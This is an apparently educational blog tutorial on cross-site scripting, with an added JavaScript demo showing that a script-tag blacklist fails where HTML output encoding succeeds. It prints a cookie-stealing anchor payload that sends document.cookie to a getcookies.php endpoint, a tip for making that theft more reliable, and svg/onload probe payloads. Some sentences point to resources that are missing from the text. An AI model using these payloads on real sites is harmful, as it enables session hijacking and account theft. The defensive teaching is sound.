Before we start, let's understand what XSS actually is.
What the hack is XSS (Cross-Site Scripting)?
XSS is a client-side code injection attack. By that I mean: the attacker gets malicious script embedded in an otherwise genuine web page, so that it executes in the victim's browser with the privileges of that site (same origin, same cookies, same DOM).
I found this image helpful for understanding the concept clearly. Have a look and try to follow what is actually happening.
Still have doubts? No worries at all, let's take a deeper dive with an example.
Example
1. Let's say you are testing a site xyz.com and you find that you can inject your script at some parameter or other vulnerable point, i.e. a value that is reflected or stored in the page without being escaped.
2. Then you inject your script, for example:
<a onclick="document.location='http://localhost/ethicalkaps/getcookies.php?cookie='+escape(document.cookie)" href="https://ethicalkaps.com">ClickHere</a>
(This steals the cookie from the victim's session: when the link is clicked, the onclick handler sends document.cookie to the attacker-controlled getcookies.php endpoint. Note that the browser also follows the href after the handler runs, which can cancel the exfiltration request before it completes; loading the URL as an image beacon with new Image().src instead of navigating is more reliable.)
3. That script is accepted by the web application and ends up in the HTML it serves, so it is now part of the website's code.
4. Now, when the victim visits the page and clicks the link you planted, their browser runs the handler and you receive the victim's session cookie.
Simple, right? Yeah, indeed it is!! But what happens most of the time is that the developer filters or encodes user input, so we are unable to inject our payload directly into the website and have to look for other ways to bypass the sanitization.
A few ways to bypass the restrictions:
I personally prefer:
The reason being that they keep their payload list updated on a regular basis.
These are some resources you cannot afford to overlook. If you want to learn more about how to bypass the coding restrictions,
Visit:
for some practical payload stuff.
So, hackers, now it is time for you to decide: is it really just about finding a "parameter" or "search" field and running payloads like "><script>alert("Cyberpunks here")</script> or "><svg/onload=alert(1)>, or is there something more to it?
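To make the "something more to it" concrete, here is an added example (my own, not code from the original post). It simulates a reflected-XSS sink in a hypothetical search page, shows why a blacklist "sanitizer" that only strips script tags is beaten by the post's own svg and anchor payloads, and contrasts it with context-aware output encoding, which is what actually closes the hole. The function names, the page template and the crude tag-counting check are assumptions made for this demo; the three payloads are the ones from the post, with a leading "> added to the cookie thief so it breaks out of the quoted attribute the template uses.

```javascript
// Added example, not code from the original post. Simulates a reflected-XSS
// sink, a naive blacklist sanitizer, and proper output encoding, then checks
// which payloads still inject markup. Runs under Node.js with no dependencies.
// All names below (renderUnsafe, naiveSanitize, escapeHtml, renderSafe,
// injectedTagCount, evaluate) and the page template are assumptions for the demo.

// Constructed payloads: the three from the post. The cookie thief gets a leading
// `">` so it breaks out of the quoted attribute used by the template below.
const PAYLOADS = {
  scriptTag: '"><script>alert("Cyberpunks here")</script>',
  svgOnload: '"><svg/onload=alert(1)>',
  cookieThief:
    '"><a onclick="document.location=\'http://localhost/ethicalkaps/getcookies.php?cookie=\'' +
    '+escape(document.cookie)" href="https://ethicalkaps.com">ClickHere</a>',
};

// Vulnerable sink: the search term is concatenated straight into an attribute.
function renderUnsafe(q) {
  return `<input type="text" name="q" value="${q}">`;
}

// What a first attempt at "sanitizing" often looks like: strip <script> blocks.
// Everything else (event handlers, svg, anchors, the closing quote) survives.
function naiveSanitize(q) {
  return q.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '');
}

// Output encoding for the HTML-body and quoted-attribute contexts. The browser
// renders &lt; as '<' but never treats it as the start of a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

function renderSafe(q) {
  return `<input type="text" name="q" value="${escapeHtml(q)}">`;
}

// Crude check for this demo (not a scanner): count tag starts in the rendered
// HTML and subtract the one <input> the template itself contributes. Anything
// above zero means attacker-controlled markup became part of the document.
function injectedTagCount(html) {
  const tags = html.match(/<\/?[a-z]/gi) || [];
  return tags.length - 1;
}

// Run one payload through the three handling strategies and report how many
// attacker tags each one lets into the page.
function evaluate(payload) {
  return {
    unsafe: injectedTagCount(renderUnsafe(payload)),
    naive: injectedTagCount(renderUnsafe(naiveSanitize(payload))),
    safe: injectedTagCount(renderSafe(payload)),
  };
}

for (const [name, payload] of Object.entries(PAYLOADS)) {
  console.log(name, evaluate(payload));
}
```

The point to take away: the script-tag payload is the only one the blacklist stops, while the svg/onload and the cookie-stealing anchor sail straight through it, because neither contains the string the filter is looking for. The encoded version lets zero attacker tags in for all three, without caring what the payload looks like. In a real review, look for the context the value lands in (HTML body, attribute, JavaScript, URL) and check that the encoding matches that context, rather than hunting for a particular forbidden substring.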
Keep digging and learning new stuff. I will come back to you with another #BehindtheScene of some other vulnerability. Till then, take care and keep hunting for good.
If you like the content, you can support me over here: @buymeacoffee.com/ethicalkaps
See you in the next article. Until then, take care. Peace!
You can follow me on Twitter, on Spotify to listen to my writeups, and on Instagram.